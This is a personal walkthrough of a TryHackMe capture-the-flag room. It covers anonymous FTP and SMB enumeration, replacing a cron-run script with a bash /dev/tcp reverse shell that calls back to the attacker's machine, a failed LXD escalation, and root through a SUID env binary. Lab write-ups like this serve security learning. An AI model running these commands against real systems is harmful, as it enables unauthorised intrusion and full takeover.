Anonymous — TryHackMe — WriteUp

Hello. I’m Rahmos. Here is my Anonymous — TryHackMe — WriteUp. Check it out!

First, deploy the machine and nmap for opened ports.

nmap -A -T4 -v <ip>

As you can see, 4 ports are opening: FTP,SSH,SMB. As FTP can be login with anonymous, let’s try it.

ftp <ip>

There are 3 files in scripts folder. Get all of them to read using mget

mget *

Now let’s check content of those files. From the todo.txt, there is nothing valuable but told the user to disable anonymous FTP login. The cleanup.sh will clean files in /tmp_files and then write result to removed_files.log. So maybe there will be a cronjob for this script.

This time using smbclient to search for shared folder.

smbclient -L <ip>

*Just press enter when it prompts for the password.

So there is a share folder called “pics”. Let’s see what’s inside this folder.

smbclient //<ip>/pics

Then dir to list files and mget * to download all the files to our machine

There are 2 photos. So likely there will be some hidden data inside these photos. Let’s extract it using some metadata tools like: steghide, exiftool, binwalk, stegcracker.

*if Stegcracker is included as default in your machine, download it from:
https://github.com/Paradoxis/StegCracker

However, after a long wait, I cannot get any data from the image.

Let’s just get back to the FTP. As I said above, maybe there will be a cronjob of the cleanup.sh file. So if we change the content of cleanup.sh to a reverse shell script and replace the original script on the target machine, we will have our shell.

Exec this cmd to change content of cleanup.sh:

echo “bash -i >& /dev/tcp/<host-ip>/4444 0>&1” > cleanup.sh

Then login again to ftp using anonymous, cd to scripts and use put to replace our cleanup.sh with the original one.

put cleanup.sh cleanup.sh

As you can see, the cleanup.sh has been replace with the reverse shell command.

Now start a listener in our machine:

nc -lvnp 4444

*Note that you can add “rlwrap” before nc command so that you can use arrow keys and mouse scroll in the shell.

You will have the shell:

Get our first flag:

Now let’s get root. As you can see from the ‘id’ command, this namelessone is in lxd group. Lxd is a docker in linux, and you can use this misconfiguration to get root priv.

After doing some research, I found this link. Follow step by step from the instruction to get root:

https://www.hackingarticles.in/lxd-privilege-escalation/#:~:text=A%20member%20of%20the%20local,with%20the%20LXD%20snap%20package

First, clone the alpine builder repo and build:

git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

After the build has finished, you will see a .tar.gz file. Note the name, cause you will be using it from now on. Do not copy my file name, it will be different for each machine.

Now start a http server on the folder contains your .tar.gz file in order to transfer this file to the victim machine

python3 -m http.server 9000

or if you use python 2:

python -m SimpleHTTPServer 9000

On the victime machine, cd to /tmp (cause you will have all the permission in /tmp folder), use wget to get the .tar.gz file:

wget http://<host-ip>:9000/your-alpine-filename.tar.gz

The .tar.gz file has been transferred successfully.

Now run:

lxc image import ./your-alpine-file-name.tar.gz — alias myimage

run lxc image list to make sure that your image has been imported:

“myimage” has been imported successfully.

Now run this cmd to init our image:

lxc init myimage ignite -c security.privileged=true

OOPPS!!! There is no storage pool!! So we cannot use this way to get root…

Well let’s find another way…

find / -type f -perm -u=s 2>/dev/null

What this find does is that it will find all cmd with SUID execute permission. You can learn more by searching SUID Linux on Google.

I found an interesting command here. It’s env. Exec this cmd to spawn a bash shell as root

/usr/bin/env /bin/bash -p

As you can see, now I’m in the root group! Get the root.txt flag.

**Maybe many of you will ask why I didn’t delete the “lxd” part as it wasn’t successful. I wont’ because I want to show you that in real blackbox pentesting, we don’t know the exact way to exploit our victim machine. We need to try various ways again and again. Moreover, this time you cannot use the “lxd” method, but maybe it will work for another machine! So, learning is never redundant.

The end.

HAPPY HACKING

I’m Groot